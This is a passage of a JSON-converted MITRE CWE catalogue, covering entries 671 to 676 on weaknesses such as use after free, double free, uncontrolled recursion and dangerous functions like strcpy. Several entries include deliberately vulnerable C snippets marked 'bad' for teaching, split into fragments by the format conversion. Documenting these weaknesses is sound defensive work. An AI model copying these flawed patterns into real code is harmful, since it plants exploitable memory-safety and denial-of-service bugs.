Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Time_of_Introduction"}]}},"671":{"attr":{"@_ID":"671","@_Name":"Lack of Administrator Control over Security","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product uses security features in a way that prevents the product\'s administrator from tailoring security settings to reflect the environment in which the product is being used. This introduces resultant weaknesses or prevents it from operating at a level of security that is desired by the administrator.","Extended_Description":"If the product\'s administrator does not have the ability to manage security-related decisions at all times, then protecting the product from outside threats - including the product\'s developer - can become impossible. For example, a hard-coded account name and password cannot be changed by the administrator, thus exposing that product to attacks that the administrator can not prevent.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"657","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2008-04-11","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships, Relevant_Properties"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Design Principle Violation: Lack of Administrator Control over Security","attr":{"@_Date":"2009-01-12"}}}},"672":{"attr":{"@_ID":"672","@_Name":"Operation on a Resource after Expiration or Release","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software uses, accesses, or otherwise operates on a resource after that resource has been expired, released, or revoked.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"666","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality"],"Impact":["Modify Application Data","Read Application Data"],"Note":"If a released resource is subsequently reused or reallocated, then an attempt to use the original resource might allow access to sensitive data that is associated with a different user or entity."},{"Scope":["Other","Availability"],"Impact":["Other","DoS: Crash, Exit, or Restart"],"Note":"When a resource is released it might not be in an expected state, later attempts to access the resource may lead to resultant errors that may lead to a crash."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-71"},"Intro_Text":"The following code shows a simple example of a use after free error:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char* ptr = (char*)malloc (SIZE);if (err) {}...if (abrt) {}","xhtml:br":["","",""],"xhtml:div":[{"#text":"abrt = 1;free(ptr);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"logError(\\"operation aborted before commit\\", ptr);","attr":{"@_style":"margin-left:10px;"}}]}},"Body_Text":"When an error occurs, the pointer is immediately freed. However, this pointer is later incorrectly used in the logError function."},{"attr":{"@_Demonstrative_Example_ID":"DX-72"},"Intro_Text":"The following code shows a simple example of a double free error:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char* ptr = (char*)malloc (SIZE);...if (abrt) {}...free(ptr);","xhtml:br":["","","",""],"xhtml:div":{"#text":"free(ptr);","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":["Double free vulnerabilities have two common (and sometimes overlapping) causes:",{"xhtml:ul":{"xhtml:li":[{"xhtml:div":"Error conditions and other exceptional circumstances"},{"xhtml:div":"Confusion over which part of the program is responsible for freeing the memory"}]}},"Although some double free vulnerabilities are not much more complicated than the previous example, most are spread out across hundreds of lines of code or even different files. Programmers seem particularly susceptible to freeing global variables more than once."]},{"Intro_Text":"In the following C/C++ example the method processMessage is used to process a message received in the input array of char arrays. The input message array contains two char arrays: the first is the length of the message and the second is the body of the message. The length of the message is retrieved and used to allocate enough memory for a local char array, messageBody, to be created for the message body. The messageBody is processed in the method processMessageBody that will return an error if an error occurs while processing. If an error occurs then the return result variable is set to indicate an error and the messageBody char array memory is released using the method free and an error message is sent to the logError method.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define FAIL 0#define SUCCESS 1#define ERROR -1#define MAX_MESSAGE_SIZE 32int processMessage(char **message){}","xhtml:br":["","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int result = SUCCESS;int length = getMessageLength(message[0]);char *messageBody;if ((length &gt; 0) &amp;&amp; (length &lt; MAX_MESSAGE_SIZE)) {}else {}if (result == ERROR) {}return result;","xhtml:br":["","","","","","","","","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"messageBody = (char*)malloc(length*sizeof(char));messageBody = &amp;message[1][0];int success = processMessageBody(messageBody);if (success == ERROR) {}","xhtml:br":["","","","",""],"xhtml:div":{"#text":"result = ERROR;free(messageBody);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},{"#text":"printf(\\"Unable to process message; invalid message length\\");result = FAIL;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"logError(\\"Error processing message\\", messageBody);","attr":{"@_style":"margin-left:10px;"}}]}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"...messageBody = (char*)malloc(length*sizeof(char));messageBody = &amp;message[1][0];int success = processMessageBody(messageBody);if (success == ERROR) {}...","xhtml:br":["","","","","","",""],"xhtml:div":{"#text":"result = ERROR;logError(\\"Error processing message\\", messageBody);free(messageBody);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}}],"Body_Text":"However, the call to the method logError includes the messageBody after the memory for messageBody has been released using the free method. This can cause unexpected results and may lead to system crashes. A variable should never be used after its memory resources have been released."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2009-3547","Description":"chain: race condition might allow resource to be released before operating on it, leading to NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3547"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP15","Entry_Name":"Faulty Resource Use"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO46-C","Entry_Name":"Do not access a closed file","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM30-C","Entry_Name":"Do not access freed memory","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-672"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-672"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples, Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Use of a Resource after Expiration or Release","attr":{"@_Date":"2010-02-16"}}}},"673":{"attr":{"@_ID":"673","@_Name":"External Influence of Sphere Definition","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product does not prevent the definition of control spheres from external actors.","Extended_Description":"Typically, a product defines its control sphere within the code itself, or through configuration by the product\'s administrator. In some cases, an external party can change the definition of the control sphere. This is typically a resultant weakness.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other"}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"Consider a blog publishing tool, which might have three explicit control spheres: the creation of articles, only accessible to a \\"publisher;\\" commenting on articles, only accessible to a \\"commenter\\" who is a registered user; and reading articles, only accessible to an anonymous reader. Suppose that the application is deployed on a web server that is shared with untrusted parties. If a local user can modify the data files that define who a publisher is, then this user has modified the control sphere. In this case, the issue would be resultant from another weakness such as insufficient permissions."},{"Intro_Text":"In Untrusted Search Path (CWE-426), a user might be able to define the PATH environment variable to cause the product to search in the wrong directory for a library to load. The product\'s intended sphere of control would include \\"resources that are only modifiable by the person who installed the product.\\" The PATH effectively changes the definition of this sphere so that it overlaps the attacker\'s sphere of control."}]},"Notes":{"Note":{"#text":"A \\"control sphere\\" is a set of resources and behaviors that are accessible to a single actor, or a group of actors. A product\'s security model will typically define multiple spheres, possibly implicitly. For example, a server might define one sphere for \\"administrators\\" who can create new user accounts with subdirectories under /home/server/, and a second sphere might cover the set of users who can create or delete files within their own subdirectories. A third sphere might be \\"users who are authenticated to the operating system on which the product is installed.\\" Each sphere has different sets of actors and allowable behaviors.","attr":{"@_Type":"Theoretical"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships, Relevant_Properties"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"674":{"attr":{"@_ID":"674","@_Name":"Uncontrolled Recursion","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product does not properly control the amount of recursion which takes place,  consuming excessive resources, such as allocated memory or the program stack.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"691","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Stack Exhaustion"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"The uncontrolled recursion is often due to an improper or missing conditional"}},"Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":["DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)"],"Note":"Resources including CPU, memory, and stack memory could be rapidly consumed or exhausted, eventually leading to an exit or crash."},{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"In some cases, an application\'s interpreter might kill a process or thread that appears to be consuming too much resources, such as with PHP\'s memory_limit setting. When the interpreter kills the process/thread, it might report an error containing detailed information such as the application\'s installation path."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Ensure an end condition will be reached under all logic conditions.  The end condition may include testing against the depth of recursion and exiting with an error if the recursion goes too deep. The complexity of the end condition contributes to the effectiveness of this action.","Effectiveness":"Moderate"},{"Phase":"Implementation","Description":"Increase the stack size.","Effectiveness":"Limited","Effectiveness_Notes":"Increasing the stack size might only be a temporary measure, since the stack typically is still not very large, and it might remain easy for attackers to cause an out-of-stack fault."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In this example a mistake exists in the code where the exit condition contained in flg is never called. This results in the function calling itself over and over again until the stack is exhausted.","Example_Code":[{"#text":"void do_something_recursive (int flg){}int flag = 1; // Set to TRUEdo_something_recursive (flag);","attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:br":["","","",""],"xhtml:div":{"#text":"... // Do some real work here, but the value of flg is unmodifiedif (flg) { do_something_recursive (flg); }    // flg is never modified so it is always TRUE - this call will continue until the stack explodes","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}},{"#text":"void do_something_recursive (int flg){}int flag = 1; // Set to TRUEdo_something_recursive (flag);","attr":{"@_Nature":"good","@_Language":"C"},"xhtml:br":["","","",""],"xhtml:div":[{"#text":"... // Do some real work here","attr":{"@_style":"margin-left:20px;"}},{"#text":"// Modify value of flg on done condition","attr":{"@_style":"margin-left:10px;"}},{"#text":"if (flg) { do_something_recursive (flg); }    // returns when flg changes to 0","attr":{"@_style":"margin-left:10px;"}}]}],"Body_Text":"Note that the only difference between the Good and Bad examples is that the recursion flag will change value and cause the recursive to return."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-1285","Description":"Deeply nested arrays trigger stack exhaustion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1285"},{"Reference":"CVE-2007-3409","Description":"Self-referencing pointers create infinite loop and resultant stack exhaustion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3409"},{"Reference":"CVE-2016-10707","Description":"Javascript application accidentally changes input in a way that prevents a recursive call from detecting an exit condition.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10707"},{"Reference":"CVE-2016-3627","Description":"An attempt to recover a corrupted XML file infinite recursion protection counter was not always incremented missing the exit condition.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3627"},{"Reference":"CVE-2019-15118","Description":"USB-audio driver\'s descriptor code parsing allows unlimited recursion leading to stack exhaustion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15118"}]},"Affected_Resources":{"Affected_Resource":"CPU"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A9","Entry_Name":"Denial of Service","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP13","Entry_Name":"Unrestricted Consumption"},{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-CWE-674"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"230"}},{"attr":{"@_CAPEC_ID":"231"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-CWE-674"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Demonstrative_Examples, Description, Modes_of_Introduction, Observed_Examples, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations"}]}},"675":{"attr":{"@_ID":"675","@_Name":"Multiple Operations on Resource in Single-Operation Context","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product performs the same operation on a resource two or more times, when the operation should only be applied once.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"586","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"102","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other"}},"Notes":{"Note":{"#text":"This weakness is probably closely associated with other issues related to doubling, such as CWE-462 (duplicate key in alist) or CWE-102 (Struts duplicate validation forms). It\'s usually a case of an API contract violation (CWE-227).","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Relevant_Properties, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"676":{"attr":{"@_ID":"676","@_Name":"Use of Potentially Dangerous Function","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program invokes a potentially dangerous function that could introduce a vulnerability if it is used incorrectly, but the function can also be used safely.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1177","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary"},{"Ordinality":"Indirect"}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Varies by Context","Quality Degradation","Unexpected State"],"Note":"If the function is used incorrectly, then it could result in security problems."}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis"]}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Binary / Bytecode Quality Analysis","Binary / Bytecode simple extractor - strings, ELF readers, etc."]}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Debugger"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Monitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious"}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Focused Manual Spotcheck - Focused manual analysis of source"}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Warning Flags","Source Code Quality Analyzer"]}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Origin Analysis"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Formal Methods / Correct-By-Construction","Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"]}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":{"Phase":["Build and Compilation","Implementation"],"Description":"Identify a list of prohibited API functions and prohibit developers from using these functions, providing safer alternatives. In some cases, automatic code analysis tools or the compiler can be instructed to spot use of prohibited functions, such as the \\"banned.h\\" include file from Microsoft\'s SDL. [REF-554] [REF-7]"}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-6"},"Intro_Text":"The following code attempts to create a local copy of a buffer to perform some manipulations to the data.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void manipulate_string(char * string){}","xhtml:div":{"#text":"char buf[24];strcpy(buf, string);...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":"However, the programmer does not ensure that the size of the data pointed to by string will fit in the local buffer and copies the data with the potentially dangerous strcpy() function. This may result in a buffer overflow condition if an attacker can influence the contents of the string parameter."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-1470","Description":"Library has multiple buffer overflows using sprintf() and 